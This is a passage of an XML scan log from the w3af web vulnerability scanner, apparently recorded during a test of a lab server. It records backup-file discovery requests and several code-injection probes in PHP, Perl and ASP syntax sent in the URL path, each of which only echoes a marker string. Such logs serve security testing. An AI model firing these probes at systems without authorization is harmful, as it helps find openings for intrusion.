                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="254">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27zzrpn%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="259">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27zzrpn%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27zzrpn%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="261">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22zzrpn%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
